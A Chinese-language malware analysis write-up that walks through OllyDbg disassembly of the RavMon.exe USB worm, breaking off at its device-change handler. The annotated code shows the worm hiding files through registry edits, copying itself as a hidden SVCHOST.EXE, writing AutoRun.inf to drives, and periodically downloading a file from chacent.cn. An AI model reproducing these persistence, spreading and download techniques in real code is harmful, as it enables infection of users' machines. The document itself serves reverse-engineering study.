【文章作者】: newjueqi
【作者邮箱】: zengjiansheng1@126.com
【作者QQ号】: 190678908
【使用工具】: OD
【加壳方式】: 未知壳
【操作平台】: XP-SP2
【作者声明】: 本文是站在petnt大侠肩膀上的成果^-^。petnt大侠发表了“简单病毒RavMon.exe的分析”( http://bbs.pediy.com/showthread.php?t=76310),文中没有给出详细的代码分析,本人尝试分析这个病毒,把结果写成文章,当作是petnt大侠文章的补充。失误之处敬请诸位大侠赐教!
用peid查看了RavMon.exe文件,显示结果为:Nothing found [Overlay] * ,没关系,这个病毒可以带壳调试,本人也懒得脱壳 ^-^
用OD打开RavMon.exe文件,显示如下:
004141B0 > 833D 484E4100 0>cmp dword ptr [414E48], 0 ;入口地址
004141B7 75 05 jnz short 004141BE
004141B9 E9 01000000 jmp 004141BF
004141BE C3 retn
004141BF E8 46000000 call 0041420A
004141C4 E8 73000000 call 0041423C
004141C9 B8 B0414100 mov eax, offset <模块入口点>
004141CE 2B05 084E4100 sub eax, dword ptr [414E08]
004141D4 A3 444E4100 mov dword ptr [414E44], eax
004141D9 E8 9C000000 call 0041427A
004141DE E8 1A020000 call 004143FD
004141E3 E8 CA060000 call 004148B2
004141E8 E8 19060000 call 00414806
004141ED A1 444E4100 mov eax, dword ptr [414E44]
004141F2 C705 484E4100 0>mov dword ptr [414E48], 1
004141FC 0105 004E4100 add dword ptr [414E00], eax
00414202 FF35 004E4100 push dword ptr [414E00]
00414208 C3 retn ;这就是壳的出口
然后来到如下的代码:
004038BB 6A db 6A ; CHAR 'j'
004038BC . 60 pushad
004038BD ? 68 C0954000 push 004095C0
004038C2 ? E8 81030000 call 00403C48
004038C7 ? BF 94000000 mov edi, 94
004038CC ? 8BC7 mov eax, edi
004038CE ? E8 CD1E0000 call 004057A0
004038D3 89 db 89
004038D4 65 db 65 ; CHAR 'e'
004038D5 E8 db E8
看到的代码很奇怪,这时只要按Ctrl+A让OD重新分析代码,就可以正常显示汇编代码:
004038BB . 6A 60 push 60
004038BD . 68 C0954000 push 004095C0
004038C2 . E8 81030000 call 00403C48
004038C7 . BF 94000000 mov edi, 94
004038CC . 8BC7 mov eax, edi
004038CE . E8 CD1E0000 call 004057A0
…………
…………
来到这里:
00403A41 . E8 6ADBFFFF call 004015B0 ;这是关键call,跟进去
来到这里
004015B0 /$ 81EC 90020000 sub esp, 290
004015B6 |. A1 88B04000 mov eax, dword ptr [40B088>
004015BB |. 53 push ebx
004015BC |. 55 push ebp
004015BD |. 56 push esi
004015BE |. 57 push edi
004015BF |. 68 FF000000 push 0FF ; /BufSize = FF (255.)
004015C4 |. 68 58B84000 push 0040B858 ; |PathBuffer = RavMon.0040B858
004015C9 |. 33DB xor ebx, ebx ; |
004015CB |. 53 push ebx ; |hModule => NULL
004015CC |. 898424 A80200>mov dword ptr [esp+2A8], e>; |
004015D3 |. 33ED xor ebp, ebp ; |
004015D5 |. FF15 40904000 call dword ptr [409040] ; \GetModuleFileNameA;文件的完整路径存储
在0040B858
004015DB |. 68 04010000 push 104
004015E0 |. 68 58B84000 push 0040B858
004015E5 |. 68 60B94000 push 0040B960
004015EA |. E8 A11D0000 call 00403390 ;把文件完整路径存储在0040B960
004015EF |. 6A 5C push 5C
004015F1 |. 68 60B94000 push 0040B960
004015F6 |. E8 651D0000 call 00403360
004015FB |. 8BF0 mov esi, eax ; RavMon.0040B975
…………
…………
0040163A |. >add esp, 8
0040163D |> >call 00402370 ;通过修改注册表实现系统将不再显示隐藏文件和扩展名
00402370 /$ >sub esp, 8
00402373 |. >push ebx
00402374 |. >mov ebx, dword ptr [409004] ; ADVAPI32.RegCreateKeyExA
0040237A |. >push esi
0040237B |. >push edi
0040237C |. >push 0 ; /pDisposition = NULL
0040237E |. >lea eax, dword ptr [esp+10] ; |
00402382 |. >push eax ; |pHandle
00402383 |. >push 0 ; |pSecurity = NULL
00402385 |. >push 0F003F ; |Access = KEY_ALL_ACCESS
0040238A |. >push 0 ; |Options = REG_OPTION_NON_VOLATILE
0040238C |. >push 0 ; |Class = NULL
0040238E |. >push 0 ; |Reserved = 0
00402390 |. >push 004094D8 ; |Subkey =
"SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"
00402395 |. >push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
0040239A |. >call ebx ; \RegCreateKeyExA
0040239C |. >test eax, eax
0040239E |. >mov esi, dword ptr [40900C] ; ADVAPI32.RegSetValueExA
004023A4 |. >mov edi, dword ptr [409010] ; ADVAPI32.RegCloseKey
004023AA |. >jnz short 004023DA
004023AC |. >mov ecx, dword ptr [esp+C]
004023B0 |. >push 004094C8 ; /ValueName = "CheckedValue"
004023B5 |. >push ecx ; |hKey=6C
004023B6 |. >call dword ptr [409000] ; \RegDeleteValueA,删除
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL中的
CheckedValue
004023BC |. >mov edx, dword ptr [esp+C]
004023C0 |. >push 4 ; /BufSize = 4
004023C2 |. >push 004094C4 ; |Buffer = RavMon.004094C4
004023C7 |. >push 1 ; |ValueType = REG_SZ
004023C9 |. >push 0 ; |Reserved = 0
004023CB |. >push 004094C8 ; |ValueName = "CheckedValue"
004023D0 |. >push edx ; |hKey
004023D1 |. >call esi ; \RegSetValueExA,新建一个CheckedValue,值为0
004023D3 |. >mov eax, dword ptr [esp+C]
004023D7 |. >push eax ; /hKey
004023D8 |. >call edi ; \RegCloseKey
004023DA |> >push 0
004023DC |. >lea ecx, dword ptr [esp+10]
004023E0 |. >push ecx
004023E1 |. >push 0
004023E3 |. >push 20006
004023E8 |. >push 0
004023EA |. >push 0
004023EC |. >push 0
004023EE |. >push 00409488 ; ASCII
"SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
004023F3 |. >push 80000001
004023F8 |. >call ebx ; \RegCreateKeyExA
004023FA |. >test eax, eax
004023FC |. >jnz short 00402423
004023FE |. >push 4
00402400 |. >lea edx, dword ptr [esp+14]
00402404 |. >push edx
00402405 |. >push 4
00402407 |. >push eax
00402408 |. >mov eax, dword ptr [esp+1C]
0040240C |. >push 00409480 ; ASCII "Hidden"
00402411 |. >push eax
00402412 |. >mov dword ptr [esp+28], 2
0040241A |. >call esi ; \RegSetValueExA
0040241C |. >mov ecx, dword ptr [esp+C]
00402420 |. >push ecx
00402421 |. >call edi ; ADVAPI32.RegCloseKey
00402423 |> >pop edi
00402424 |. >pop esi
00402425 |. >pop ebx
00402426 |. >add esp, 8
00402429 \. >retn
0040164D |. 68 04010000 push 104 ; /BufSize = 104 (260.)
00401652 |. 68 30B74000 push 0040B730 ; |Buffer = RavMon.0040B730
00401657 |. FF15 38904000 call dword ptr [409038] ; \GetWindowsDirectoryA
0040165D |. 33C0 xor eax, eax
0040165F |. 90 nop
00401660 |> 8A88 30B74000 /mov cl, byte ptr [eax+40B730] ;这段循环把Windows的目录路径复制
到12fc80
00401666 |. 888C04 940000>|mov byte ptr [esp+eax+94], cl
0040166D |. 40 |inc eax
0040166E |. 3ACB |cmp cl, bl
00401670 |.^ 75 EE \jnz short 00401660
00401672 |. 8DBC24 940000>lea edi, dword ptr [esp+94] ;把堆栈里Windows的目录路径复制到edi
00401679 |. 4F dec edi
0040167A |. 8D9B 00000000 lea ebx, dword ptr [ebx]
………
………
004016AF |. >mov byte ptr [edi+C], cl
004016B2 >call 00401B90 ; 检查系统路径是否合法
004016B7 |. >push 0040B858 ;
004016BC |. >call 00401B90 ; 检查文件运行的路径是否合法
004016C1 |. >add esp, 8
004016C4 |. >mov esi, 0040B858
004016C9 |. >lea eax, dword ptr [esp+94]
;004016D0-004016EE是比较当前文件路径是否系统路径
004016D0 |> >/mov dl, byte ptr [eax]
004016D2 |. >|mov cl, dl
004016D4 |. >|cmp dl, byte ptr [esi]
004016D6 |. >|jnz short 004016F4
004016D8 |. >|cmp cl, bl
004016DA |. >|je short 004016F0
004016DC |. >|mov dl, byte ptr [eax+1]
004016DF |. >|mov cl, dl
004016E1 |. >|cmp dl, byte ptr [esi+1]
004016E4 |. >|jnz short 004016F4
004016E6 |. >|add eax, 2
004016E9 |. >|add esi, 2
004016EC |. >|cmp cl, bl
004016EE |.^ >\jnz short 004016D0
004016F0 |> >xor eax, eax
004016F2 |. >jmp short 004016F9
004016F4 |> >sbb eax, eax
004016F6 |. >sbb eax, -1
004016F9 |> >cmp eax, ebx
………
………
;当前文件不是系统目录下的运行文件
004016FB |. >push 00409280 ; /IniFileName = "SVCHOST.INI"
00401700 |. >je 0040183C ; |
00401706 |. >mov ebp, dword ptr [409034] ; |kernel32.GetPrivateProfileStringA
0040170C |. >push 14 ; |BufSize = 14 (20.)
0040170E |. >lea eax, dword ptr [esp+78] ; |
00401712 |. >push eax ; |ReturnBuffer
00401713 |. >push 0040927C ; |Default = "100"
00401718 |. >push 00409274 ; |Key = "version"
0040171D |. >push 0040926C ; |Section = "INFO"
00401722 |. >call ebp ; \GetPrivateProfileStringA,在SVCHOST.INI中获取病
毒的版本号
00401724 |. >mov edi, 00409268 ; ASCII "104"
00401729 |. >lea esi, dword ptr [esp+70]
0040172D |. >mov ecx, 4
00401732 |. >xor eax, eax
00401734 |. >repe cmps byte ptr es:[edi], by> ;把当前版本号和在SVCHOST.INI中获取的版
本号进行比较
00401736 |. >je short 0040173D
00401738 |. >sbb eax, eax
0040173A |. >sbb eax, -1
0040173D |> >cmp eax, ebx
0040173F |. >push 00409280 ; ASCII "SVCHOST.INI"
00401744 |. >push 14
00401746 |. >jl short 00401779
00401748 |. >lea ecx, dword ptr [esp+78]
0040174C |. >push ecx
0040174D |. >push 00409260 ; ASCII "default"
00401752 |. >push 0040925C ; ASCII "win"
00401757 |. >push 0040926C ; ASCII "INFO"
0040175C |. >call ebp ; kernel32.GetPrivateProfileStringA
0040175E |. >lea edx, dword ptr [esp+70]
00401762 |. >push edx ; Title = "VNJFVAKFSDBTMKLN"
00401763 |. >push 00409254 ; |Class = "SVCHOST"
00401768 |. >call dword ptr [40917C] ; \FindWindowA
0040176E |. >test eax, eax ;检查窗口是否存在
00401770 |. >je short 004017B9 ;不存在就跳走
00401772 |> >xor eax, eax
00401774 |. >jmp 00401A21 ;跳到强行结束进程的函数调用
00401779 |> >lea eax, dword ptr [esp+78] ;如果检测到版本号不低就跳到这里
0040177D |. >push eax
0040177E |. >push 00409260 ; ASCII "default"
00401783 |. >push 0040925C ; ASCII "win"
00401788 |. >push 0040926C ; ASCII "INFO"
0040178D |. >call ebp
0040178F |. >lea ecx, dword ptr [esp+70]
00401793 |. >push ecx ; /Title
00401794 |. >push 00409254 ; |Class = "SVCHOST"
00401799 |. >call dword ptr [40917C] ; \FindWindowA
0040179F |. >cmp eax, ebx ;发现窗口存在就退出
004017A1 |. >je short 004017B9
004017A3 |. >push ebx ; /lParam
004017A4 |. >push ebx ; |wParam
004017A5 |. >push 12 ; |Message = WM_QUIT
004017A7 |. >push eax ; |hWnd
004017A8 |. >call dword ptr [409178] ; \PostMessageA
004017AE |. >push 3E8 ; /Timeout = 1000. ms
004017B3 |. >call dword ptr [409030] ; \Sleep
004017B9 |> >mov esi, dword ptr [40902C] ; kernel32.SetFileAttributesA
004017BF |. >push 80 ; /FileAttributes = NORMAL
004017C4 |. >lea edx, dword ptr [esp+98] ; |
004017CB |. >push edx ; |FileName = "C:\WINDOWS\SVCHOST.EXE"
004017CC |. >call esi ; \SetFileAttributesA,设置系统目录里文件属性,执行
完后就把病毒文件SVCHOST.EXE复制到系统目录了
004017CE |. >push ebx ; /FailIfExists
004017CF |. >lea eax, dword ptr [esp+98] ; |
004017D6 |. >push eax ; |NewFileName
004017D7 |. >push 0040B858 ; |ExistingFileName = "D:\我的文档\",D7,"烂
",B8,"",BD,"件\RAVMON.EXE"
004017DC |. >call dword ptr [409028] ; \CopyFileA,把病毒文件复制到系统目录
004017E2 |. >push 7 ; /FileAttributes = READONLY|HIDDEN|SYSTEM
004017E4 |. >lea ecx, dword ptr [esp+98] ; |
004017EB |. >push ecx ; |FileName = "C:\WINDOWS\SVCHOST.EXE"
004017EC |. >call esi ; \SetFileAttributesA,设置SVCHOST.EXE属性为只读
,隐藏,系统
004017EE |. >xor eax, eax
004017F0 |. >mov ecx, 11
004017F5 |. >lea edi, dword ptr [esp+10]
004017F9 |. >rep stos dword ptr es:[edi]
004017FB |. >lea edx, dword ptr [esp+84]
00401802 |. >push edx ; /pProcessInfo
00401803 |. >lea eax, dword ptr [esp+14] ; |
00401807 |. >push eax ; |pStartupInfo
00401808 |. >push ebx ; |CurrentDir
00401809 |. >push ebx ; |pEnvironment
0040180A |. >push ebx ; |CreationFlags
0040180B |. >push ebx ; |InheritHandles
0040180C |. >push ebx ; |pThreadSecurity
0040180D |. >push ebx ; |pProcessSecurity
0040180E |. >push ebx ; |CommandLine
0040180F |. >lea ecx, dword ptr [esp+B8] ; |
00401816 |. >push ecx ; |ModuleFileName = "C:\WINDOWS\SVCHOST.EXE"
00401817 |. >call dword ptr [4090C0] ; \CreateProcessA,通过创建新线程来运行病毒
文件
0040181D |. >mov edx, dword ptr [esp+88]
00401824 |. >mov esi, dword ptr [4090B8] ; kernel32.CloseHandle
0040182A |. >push edx ; /hObject
0040182B |. >call esi ; \CloseHandle
0040182D |. >mov eax, dword ptr [esp+84]
00401834 |. >push eax ; /hObject
00401835 |. >call esi ; \CloseHandle
00401837 |. >jmp 00401A1C ;退出
;当前路径是系统路径执行过程
0040183C |> \>push 11 ; |BufSize = 11 (17.)
0040183E |. >lea ecx, dword ptr [esp+78] ; |
00401842 |. >push ecx ; |ReturnBuffer
00401843 |. >push 00409260 ; |Default = "default"
00401848 |. >push 0040925C ; |Key = "win"
0040184D |. >push 0040926C ; |Section = "INFO"
00401852 |. >call dword ptr [409034] ; \GetPrivateProfileStringA
00401858 |. >lea edx, dword ptr [esp+70]
0040185C |. >push edx ; /Title = "HIMQWRQWOJDTJDRW"
0040185D |. >push 00409254 ; |Class = "SVCHOST"
00401862 |. >call dword ptr [40917C] ; \FindWindowA
00401868 |. >test eax, eax
0040186A |.^ >jnz 00401772 ;如果窗口存在就退出
………
………
004018A8 |.>push 7F00 ; /RsrcName = IDI_APPLICATION
004018AD |.>push ebx ; |hInst
004018AE |.>mov dword ptr [esp+8C], edx ; |
004018B5 |.>mov dword ptr [esp+90], eax ; |
004018BC |.>mov dword ptr [esp+18], ebx ; |
004018C0 |.>mov dword ptr [esp+1C], 00401000 ; | 窗口过程地址
004018C8 |.>mov dword ptr [esp+20], ebx ; |
004018CC |.>mov dword ptr [esp+24], ebx ; |
004018D0 |.>mov dword ptr [esp+28], esi ; |
004018D4 |.>call dword ptr [409174] ; \LoadIconA
004018DA |.>push 7F00 ; /RsrcName = IDC_ARROW
004018DF |.>push ebx ; |hInst
004018E0 |.>mov dword ptr [esp+2C], eax ; |
004018E4 |.>call dword ptr [409170] ; \LoadCursorA
004018EA |.>push ebx ; /ObjType
004018EB |.>mov dword ptr [esp+2C], eax ; |
004018EF |.>call dword ptr [40901C] ; \GetStockObject
004018F5 |.>lea edx, dword ptr [esp+10]
004018F9 |.>lea ecx, dword ptr [esp+84]
00401900 |.>push edx ; /pWndClass
00401901 |.>mov dword ptr [esp+30], eax ; |
00401905 |.>mov dword ptr [esp+34], ebx ; |
00401909 |.>mov dword ptr [esp+38], ecx ; |
0040190D |.>call dword ptr [40916C] ; \RegisterClassA
………
………
;在SVCHOST.INI里写入病毒版本信息
00401952 |. >push 00409280 ; /FileName = "SVCHOST.INI"
00401957 |. >push 00409268 ; |String = "104"
0040195C |. >push 00409274 ; |Key = "version"
00401961 |. >push 0040926C ; |Section = "INFO"
00401966 |. >call esi ; \WritePrivateProfileStringA
00401968 |. >push 00409280 ; /FileName = "SVCHOST.INI"
0040196D |. >lea edx, dword ptr [esp+74] ; |
00401971 |. >push edx ; |String = "BTPDELA"
00401972 |. >push 0040925C ; |Key = "win"
00401977 |. >push 0040926C ; |Section = "INFO"
0040197C |. >call esi ; \WritePrivateProfileStringA
………
………
004019C3 |. >push 6 ; /FileAttributes = HIDDEN|SYSTEM
004019C5 |. >lea ecx, dword ptr [esp+19C] ; |
004019CC |. >mov dword ptr [edi+8], edx ; |
004019CF |. >push ecx ; |FileName
004019D0 |. >mov byte ptr [edi+C], al ; |
004019D3 |. >call dword ptr [40902C] ; \SetFileAttributesA ;设置文件属性
004019D9 |. >mov esi, dword ptr [40915C] ; USER32.GetMessageA
004019DF |. >push ebx ; /MsgFilterMax
004019E0 |. >push ebx ; |MsgFilterMin
004019E1 |. >push ebx ; |hWnd
004019E2 |. >lea edx, dword ptr [esp+60] ; |
004019E6 |. >push edx ; |pMsg
004019E7 |. >call esi ; \GetMessageA
004019E9 |. >test eax, eax
004019EB |. >je short 00401A1C
004019ED |. >mov edi, dword ptr [409158] ; USER32.TranslateMessage ;
004019F3 |. >mov ebp, dword ptr [409154] ; USER32.DispatchMessageA
;进入消息循环
;下面是消息处理部分
;文件创建时的消息处理
00401042 >>xor eax, eax ; Case 1 (WM_CREATE) of switch 0040101B
00401044 .>mov dword ptr [40B720], eax
00401049 .>mov dword ptr [40B724], eax
0040104E .>mov dword ptr [40B728], eax
00401053 .>push 0040B720
00401058 .>mov byte ptr [40B72C], al
0040105D .>call 00401C00
00401062 .>push 0040B834 ; ASCII
"385323ccdc790b3302b32120ef1dbe9a"
00401067 .>push 0040B858
0040106C .>call 004030D0 ;文件的校验
00401071 .>mov esi, dword ptr [esp+510]
00401078 .>mov edi, dword ptr [409198] ; USER32.SetTimer
0040107E .>add esp, 0C
00401081 .>push 0 ; /Timerproc = NULL
00401083 .>push 7530 ; |Timeout = 30000. ms
00401088 .>push 1 ; |TimerID = 1
0040108A .>push esi ; |hWnd
0040108B .>call edi ; \SetTimer,定时器1,感染各个盘
0040108D .>push 0 ; /Timerproc = NULL
0040108F .>push 493E0 ; |Timeout = 300000. ms
00401094 .>push 2 ; |TimerID = 2
00401096 .>push esi ; |hWnd
00401097 .>call edi ; \SetTimer ;定时器2,在网上下载文件
00401099 .>call 00402370 ;通过修改注册表实现系统将不再显示隐藏文件和扩展名
WM_TIMER的消息
0040109E >>mov eax, dword ptr [esp+50C] ; Case 113 (WM_TIMER) of switch 0040101B
我们先看定时器2的处理
004010B3 .>mov ecx, dword ptr [409234] ; Case 2 of switch 004010A5
………….
………….
00401118 .>push eax ; /Buffer
00401119 .>and ecx, 3 ; |
0040111C .>push 104 ; |BufSize = 104 (260.)
00401121 .>rep movs byte ptr es:[edi], byte>; |
00401123 .>call dword ptr [409068] ; \GetTempPathA
00401129 .>lea ecx, dword ptr [esp+3F8]
00401130 .>push ecx ; /TempName
00401131 .>push 0 ; |Unique = 0
00401133 .>push 0 ; |Prefix = NULL
00401135 .>mov edx, ecx ; |
00401137 .>push edx ; |Path
00401138 .>call dword ptr [4090B4] ; \GetTempFileNameA
0040113E .>lea eax, dword ptr [esp+3F8]
00401145 .>push eax
00401146 .>lea ecx, dword ptr [esp+24]
0040114A .>push ecx
0040114B .>push 00409228 ; ASCII "chacent.cn"
00401150 .>call 00402010 ;在“chacent.cn”上下载一个文件,应该是木马
下面的部分就是执行木马程序,内容太多,不帖出来
现在来看定时器1的消息处理
00401380 >>lea ebx, dword ptr [esp+28C] ; Case 1 of switch 004010A5
00401387 .>mov ecx, ebx
00401389 .>push ecx ; /Buffer
0040138A .>push 68 ; |BufSize = 68 (104.)
0040138C .>call dword ptr [4090C8] ; \GetLogicalDriveStringsA
00401380 >>lea ebx, dword ptr [esp+28C] ; Case 1 of switch 004010A5
00401387 .>mov ecx, ebx
00401389 .>push ecx ; /Buffer
0040138A .>push 68 ; |BufSize = 68 (104.)
0040138C .>call dword ptr [4090C8] ; \GetLogicalDriveStringsA
00401392 .>mov edi, 00409211
00401397 .>mov esi, ebx
00401399 .>mov ecx, 1
0040139E .>xor edx, edx
004013A0 .>repe cmps byte ptr es:[edi], by>
004013A2 .>je short 00401406
004013A4 .>mov ebp, dword ptr [4090D0] ; kernel32.GetDriveTypeA
004013AA .>lea ebx, dword ptr [ebx]
004013B0 >>push ebx
004013B1 .>call ebp
004013B3 .>cmp eax, 2
004013B6 .>je short 004013BD
004013B8 .>cmp eax, 3
004013BB .>jnz short 004013E2
004013BD >>push 0040B834 ; ASCII "385323ccdc790b3302b32120ef1dbe9a"
004013C2 .>push 0040B040 ; ASCII "b69e4b47aa79ec1edeb98f5275ded52d"
004013C7 .>push ebx
004013C8 .>call 00401E80
004013CD .>add esp, 0C
004013D0 .>test eax, eax
004013D2 .>jnz short 004013E2
004013D4 .>push 0040B858
004013D9 .>push ebx
004013DA .>call 00401CE0 ;把病毒文件复制到U盘,并生成AutoRun.inf文件使U盘的
病毒自动运行,具体代码如下:
00401CE0 /$>sub esp, 20C
00401CE6 |.>mov eax, dword ptr [40B088]
00401CEB |.>push esi
00401CEC |.>mov dword ptr [esp+20C], eax
00401CF3 |.>mov eax, dword ptr [esp+214]
00401CFA |.>lea esi, dword ptr [esp+4]
00401CFE |.>push edi
00401CFF |.>mov ecx, eax
00401D01 |.>sub esi, eax
00401D03 |>>/mov dl, byte ptr [ecx]
00401D05 |.>|mov byte ptr [esi+ecx], dl
00401D08 |.>|inc ecx
00401D09 |.>|test dl, dl
00401D0B |.>\jnz short 00401D03
00401D0D |.>lea edx, dword ptr [esp+10C]
00401D14 |.>sub edx, eax
00401D16 |>>/mov cl, byte ptr [eax]
00401D18 |.>|mov byte ptr [edx+eax], cl
00401D1B |.>|inc eax
00401D1C |.>|test cl, cl
00401D1E |.>\jnz short 00401D16
00401D20 |.>lea edi, dword ptr [esp+8]
00401D24 |.>dec edi
00401D25 |>>/mov al, byte ptr [edi+1]
00401D28 |.>|inc edi
00401D29 |.>|test al, al
00401D2B |.>\jnz short 00401D25
00401D2D |.>mov eax, dword ptr [4093B8]
00401D32 |.>mov ecx, dword ptr [4093BC]
00401D38 |.>mov edx, dword ptr [4093C0]
00401D3E |.>mov dword ptr [edi], eax
00401D40 |.>mov dword ptr [edi+4], ecx
00401D43 |.>mov dword ptr [edi+8], edx
00401D46 |.>lea edi, dword ptr [esp+10C]
00401D4D |.>dec edi
00401D4E |.>mov edi, edi
00401D50 |>>/mov al, byte ptr [edi+1]
00401D53 |.>|inc edi
00401D54 |.>|test al, al
00401D56 |.>\jnz short 00401D50
00401D58 |.>mov eax, dword ptr [4093AC]
00401D5D |.>mov ecx, dword ptr [4093B0]
00401D63 |.>mov dx, word ptr [4093B4]
00401D6A |.>mov dword ptr [edi], eax
00401D6C |.>mov al, byte ptr [4093B6]
00401D71 |.>mov dword ptr [edi+4], ecx
00401D74 |.>mov word ptr [edi+8], dx
00401D78 |.>push 80 ; /FileAttributes = NORMAL
00401D7D |.>lea ecx, dword ptr [esp+C] ; |
00401D81 |.>mov byte ptr [edi+A], al ; |
00401D84 |.>mov edi, dword ptr [40902C] ; |kernel32.SetFileAttributesA
00401D8A |.>push ecx ; |FileName
00401D8B |.>call edi ; \SetFileAttributesA
00401D8D |.>push 0 ; /hTemplateFile = NULL
00401D8F |.>push 6 ; |Attributes = HIDDEN|SYSTEM
00401D91 |.>push 2 ; |Mode = CREATE_ALWAYS
00401D93 |.>push 0 ; |pSecurity = NULL
00401D95 |.>push 0 ; |ShareMode = 0
00401D97 |.>push 40000000 ; |Access = GENERIC_WRITE
00401D9C |.>lea edx, dword ptr [esp+20] ; |
00401DA0 |.>push edx ; |FileName
00401DA1 |.>call dword ptr [4090B0] ; \CreateFileA
00401DA7 |.>cmp eax, -1
00401DAA |.>je 00401E67
00401DB0 |.>push eax ; /hObject
00401DB1 |.>call dword ptr [4090B8] ; \CloseHandle
00401DB7 |.>mov esi, dword ptr [409024] ; kernel32.WritePrivateProfileStringA
00401DBD |.>lea eax, dword ptr [esp+8]
00401DC1 |.>push eax ; /FileName
00401DC2 |.>push 004093AC ; |String = "RavMon.exe"
00401DC7 |.>push 00409200 ; |Key = "open"
00401DCC |.>push 004093A4 ; |Section = "AutoRun"
00401DD1 |.>call esi ; \WritePrivateProfileStringA
00401DD3 |.>lea ecx, dword ptr [esp+8]
00401DD7 |.>push ecx ; /FileName
00401DD8 |.>push 00409398
00401DDD |.>push 0040938C ; |Key = "shell\open"
00401DE2 |.>push 004093A4 ; |Section = "AutoRun"
00401DE7 |.>call esi ; \WritePrivateProfileStringA
00401DE9 |.>lea edx, dword ptr [esp+8]
00401DED |.>push edx ; /FileName
00401DEE |.>push 004093AC ; |String = "RavMon.exe"
00401DF3 |.>push 00409378 ; |Key = "shell\open\Command"
00401DF8 |.>push 004093A4 ; |Section = "AutoRun"
00401DFD |.>call esi ; \WritePrivateProfileStringA
00401DFF |.>lea eax, dword ptr [esp+8]
00401E03 |.>push eax ; /FileName
00401E04 |.>push 00409368 00401E09 |.>push 00409358
; |Key = "shell\explore"
00401E0E |.>push 004093A4 ; |Section = "AutoRun"
00401E13 |.>call esi ; \WritePrivateProfileStringA
00401E15 |.>lea ecx, dword ptr [esp+8]
00401E19 |.>push ecx ; /FileName
00401E1A |.>push 00409348 ; |String = """RavMon.exe -e"""
00401E1F |.>push 00409330 ; |Key = "shell\explore\Command"
00401E24 |.>push 004093A4 ; |Section = "AutoRun"
00401E29 |.>call esi ; \WritePrivateProfileStringA
00401E2B |.>push 7 ; /FileAttributes = READONLY|HIDDEN|SYSTEM
00401E2D |.>lea edx, dword ptr [esp+C] ; |
00401E31 |.>push edx ; |FileName
00401E32 |.>call edi ; \SetFileAttributesA
00401E34 |.>push 80 ; /FileAttributes = NORMAL
00401E39 |.>lea eax, dword ptr [esp+110] ; |
00401E40 |.>push eax ; |FileName
00401E41 |.>call edi ; \SetFileAttributesA
00401E43 |.>mov edx, dword ptr [esp+21C]
00401E4A |.>push 0 ; /FailIfExists = FALSE
00401E4C |.>lea ecx, dword ptr [esp+110] ; |
00401E53 |.>push ecx ; |NewFileName
00401E54 |.>push edx ; |ExistingFileName
00401E55 |.>call dword ptr [409028] ; \CopyFileA
00401E5B |.>push 7 ; /FileAttributes = READONLY|HIDDEN|SYSTEM
00401E5D |.>lea eax, dword ptr [esp+110] ; |
00401E64 |.>push eax ; |FileName
00401E65 |.>call edi ; \SetFileAttributesA
00401E67 |>>mov ecx, dword ptr [esp+210]
00401E6E |.>pop edi
00401E6F |.>pop esi
00401E70 |.>call 00403279
00401E75 |.>add esp, 20C
00401E7B \.>retn
004013DF .>add esp, 8
004013E2 >>mov eax, ebx
004013E4 .>lea edx, dword ptr [eax+1]
004013E7 >>mov cl, byte ptr [eax]
004013E9 .>inc eax
004013EA .>test cl, cl
004013EC .>jnz short 004013E7
004013EE .>sub eax, edx
004013F0 .>lea ebx, dword ptr [ebx+eax+1]
004013F4 .>mov edi, 00409211
004013F9 .>mov esi, ebx
004013FB .>mov ecx, 1
00401400 .>xor eax, eax
00401402 .>repe cmps byte ptr es:[edi], by>
00401404 .>jnz short 004013B0
00401406 >>call 00402370 ;通过修改注册表实现系统将不再显示隐藏文件和扩展名
0040140B .>xor eax, eax
0040140D .>lea ecx, dword ptr [ecx]
00401410 >>mov cl, byte ptr [eax+40B730]
00401416 .>mov byte ptr [esp+eax+2F4], cl
0040141D .>inc eax
0040141E .>test cl, cl
00401420 .>jnz short 00401410
00401422 .>lea edi, dword ptr [esp+2F4]
00401429 .>dec edi
0040142A .>lea ebx, dword ptr [ebx]
00401430 >>mov al, byte ptr [edi+1]
00401433 .>inc edi
00401434 .>test al, al
00401436 .>jnz short 00401430
00401438 .>mov ecx, dword ptr [409208]
0040143E .>mov edx, dword ptr [40920C]
00401444 .>mov al, byte ptr [409210]
00401449 .>mov dword ptr [edi], ecx
0040144B .>mov dword ptr [edi+4], edx
0040144E .>lea ecx, dword ptr [esp+7C]
00401452 .>push ecx
00401453 .>lea edx, dword ptr [esp+2F8]
0040145A .>push edx
0040145B .>mov byte ptr [edi+8], al
0040145E .>call 004030D0 ;把病毒文件复制到本地硬盘
00401463 .>add esp, 8
00401466 .>test eax, eax
00401468 .>je short 004014A4
0040146A .>mov esi, 0040B064
0040146F .>lea eax, dword ptr [esp+7C]
00401473 >>mov dl, byte ptr [eax]
00401475 .>mov bl, byte ptr [esi]
00401477 .>mov cl, dl
00401479 .>cmp dl, bl
0040147B .>jnz short 0040149B
0040147D .>test cl, cl
0040147F .>je short 00401497
00401481 .>mov dl, byte ptr [eax+1]
00401484 .>mov bl, byte ptr [esi+1]
00401487 .>mov cl, dl
00401489 .>cmp dl, bl
0040148B .>jnz short 0040149B
0040148D .>add eax, 2
00401490 .>add esi, 2
00401493 .>test cl, cl
00401495 .>jnz short 00401473
00401497 >>xor eax, eax
00401499 .>jmp short 004014A0
0040149B >>sbb eax, eax
0040149D .>sbb eax, -1
004014A0 >>test eax, eax
004014A2 .>je short 004014B4
004014A4 >>lea eax, dword ptr [esp+2F4]
004014AB .>push eax
004014AC .>call 00402430
004014B1 .>add esp, 4
004014B4 >>lea ecx, dword ptr [esp+2F4]
004014BB .>push ecx
004014BC .>call 004024B0
004014C1 .>add esp, 4
004014C4 .>test eax, eax
004014C6 .>jnz 00401590
004014CC .>push 5 ; /IsShown = 5
004014CE .>push eax ; |DefDir
004014CF .>push eax ; |Parameters
004014D0 .>lea edx, dword ptr [esp+300] ; |
004014D7 .>push edx ; |FileName
004014D8 .>push 00409200 ; |Operation = "open"
004014DD .>push eax ; |hWnd
004014DE .>call dword ptr [40914C] ; \ShellExecuteA
004014E4 .>jmp 00401590
004014E9 >>cmp eax, 219
004014EE .>je short 00401514
下面是处理WM_DEVICECHANGE的消息
00401514 >>cmp dword ptr [esp+50C], 8000 ; Case 219 (WM_DEVICECHANGE) of
switch 0040101B
0040151F .>jnz short 00401590
